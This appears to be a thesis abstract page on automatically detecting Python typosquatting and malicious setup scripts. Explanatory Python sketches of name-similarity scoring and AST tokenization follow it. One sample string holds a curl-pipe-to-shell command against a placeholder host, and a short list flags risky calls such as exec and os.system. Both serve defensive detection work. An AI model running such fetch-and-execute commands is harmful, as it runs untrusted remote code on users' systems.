Design And Implementation Of An Automatic Detection System For Python Software Supply Chain Attacks

Posted on: 2024-07-11
Degree: Master
Type: Thesis
Country: China
Candidate: Z G Chai
Full Text: PDF
GTID: 2568306941984189
Subject: Computer technology
Abstract/Summary:
With the development of the internet and the information technology industry, software systems are becoming increasingly large and complex, which places higher demands on how software is developed. At the same time, the software supply chain is developing rapidly, and open-source software accounts for a growing share of it. As a result, attacks on weak links in the software supply chain are increasing exponentially, and such attacks occur frequently worldwide with significant impact. Among software supply chain attacks targeting Python, two low-cost and efficient methods have emerged: typosquatting and the insertion of malicious code through installation scripts. This paper addresses two problems: how to improve the recall of typosquatting attack detection, and how to effectively and accurately detect whether malicious code has been injected into Python package installation scripts. Based on the proposed solutions, an automatic detection system for Python software supply chain attacks is designed and implemented. The paper makes three main contributions:

1. To address the low recall of current typosquatting attack detection, this paper proposes a detection method based on package popularity and package name similarity. By analyzing and summarizing the package naming patterns common in typosquatting attacks, the paper designs a package name similarity algorithm built on those patterns. Compared with classical algorithms such as Levenshtein edit distance, this algorithm measures the similarity between package names more accurately. In addition, the paper splits both the package popularity threshold and the package name similarity threshold into two levels. This improves the recall of typosquatting attack detection while avoiding excessive alerts. Finally, the paper evaluates the effectiveness of the proposed method through experiments.

2. To detect effectively and accurately whether malicious code is embedded in Python package installation scripts, this paper proposes a malicious installation script detection method based on AST and Att-BiLSTM. Following the recent practice of applying deep learning to vulnerability detection, the method leaves the learning of malicious installation script features to a neural network, which avoids defining features by hand. The installation script source code is parsed into an abstract syntax tree (AST) to obtain code structure information, and a Word2Vec model converts the resulting words into vector representations. The paper also considers how TF-IDF values and sensitive API weight values affect the final classification result. A BiLSTM model then captures bidirectional semantic dependencies in the program, and an attention mechanism identifies the features that deserve the most focus. Experimental results show that the accuracy of the proposed method reaches 87.36%.

3. Based on the methods proposed in this paper, a complete automatic detection system for Python software supply chain attacks has been designed and implemented. The system consists of two core modules, a typosquatting attack detection module and an installation script detection module, together with a visual operating interface. The system is user-friendly and practical to use.
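The first contribution combines package popularity with package name similarity, each checked against a two-level threshold. A minimal sketch of that idea follows. It is not the thesis's algorithm: the naming-pattern-based similarity measure is not described in the abstract, so plain Levenshtein distance (the classical baseline the abstract names) stands in for it. The threshold values, the "alert"/"warn" labels, the way the two levels are combined, and the function names are all assumptions made for illustration.

```python
import re
from typing import Dict, List, Tuple


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert, delete, substitute) with a two-row table."""
    if len(a) < len(b):
        a, b = b, a  # keep the shorter string as the row to save memory
    previous = list(range(len(b) + 1))
    for i, ch_a in enumerate(a, start=1):
        current = [i]
        for j, ch_b in enumerate(b, start=1):
            cost = 0 if ch_a == ch_b else 1
            current.append(min(previous[j] + 1,          # deletion
                               current[j - 1] + 1,       # insertion
                               previous[j - 1] + cost))  # substitution
        previous = current
    return previous[-1]


def normalize(name: str) -> str:
    """Lowercase and collapse runs of '-', '_', '.' into '-' (PEP 503 style)."""
    return re.sub(r"[-_.]+", "-", name).lower()


def similarity(a: str, b: str) -> float:
    """Edit distance rescaled to [0, 1]; 1.0 means identical normalized names."""
    a, b = normalize(a), normalize(b)
    longest = max(len(a), len(b))
    return 1.0 if longest == 0 else 1.0 - levenshtein(a, b) / longest


# Hypothetical two-level thresholds; the abstract does not give the real values.
POPULAR_HIGH, POPULAR_LOW = 1_000_000, 100_000  # downloads of the popular package
SIM_HIGH, SIM_LOW = 0.85, 0.70                  # similarity to the popular package


def check_package(candidate: str, downloads: Dict[str, int]) -> List[Tuple[str, str]]:
    """Return (popular_package, level) pairs that the candidate name may imitate."""
    findings = []
    for target, count in downloads.items():
        if normalize(target) == normalize(candidate):
            continue  # the same package is not a typosquat of itself
        score = similarity(candidate, target)
        if count >= POPULAR_HIGH and score >= SIM_HIGH:
            findings.append((target, "alert"))
        elif count >= POPULAR_LOW and score >= SIM_LOW:
            findings.append((target, "warn"))
    return findings
```

Under these assumed thresholds, a name one character away from a very popular package is raised as an alert, while a looser match is reported only as a warning. Using a lower second tier in this way is one plausible reading of how two levels could raise recall without flooding users with alerts.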
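The second contribution starts by parsing the installation script into an abstract syntax tree before any embedding or classification takes place. The sketch below covers only that first stage, using Python's standard `ast` module, and stops before the Word2Vec, TF-IDF, and Att-BiLSTM steps. The traversal order, the token vocabulary, and the `SENSITIVE_CALLS` list are assumptions for illustration; the abstract does not specify how the thesis builds its token sequence or which APIs it treats as sensitive.

```python
import ast
from typing import List, Set

# Hypothetical list of sensitive APIs; the thesis's actual list is not given.
SENSITIVE_CALLS = {"eval", "exec", "os.system", "subprocess.Popen"}


def dotted_name(node: ast.AST) -> str:
    """Return 'a.b.c' for a Name/Attribute chain, or '' for any other callee."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def ast_tokens(source: str) -> List[str]:
    """Flatten the AST into a pre-order sequence of node-type and callee tokens."""
    tokens: List[str] = []

    def visit(node: ast.AST) -> None:
        tokens.append(type(node).__name__)
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name:
                tokens.append(name)  # keep the callee name as its own token
        for child in ast.iter_child_nodes(node):
            visit(child)

    # ast.parse only builds the tree; it never executes the script.
    visit(ast.parse(source))
    return tokens


def sensitive_calls(tokens: List[str]) -> Set[str]:
    """Return the tokens that match the (assumed) sensitive API list."""
    return {token for token in tokens if token in SENSITIVE_CALLS}


# Illustrative script text that is only parsed, never run.
SAMPLE = "import os\nos.system('curl http://example.invalid | sh')\n"
print(sensitive_calls(ast_tokens(SAMPLE)))
```

A token sequence like this could then be fed to an embedding model, with sensitive tokens given extra weight. How the thesis actually performs that weighting is not stated in the abstract.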
Keywords/Search Tags: software supply chain, typosquatting attack, installation script, detection system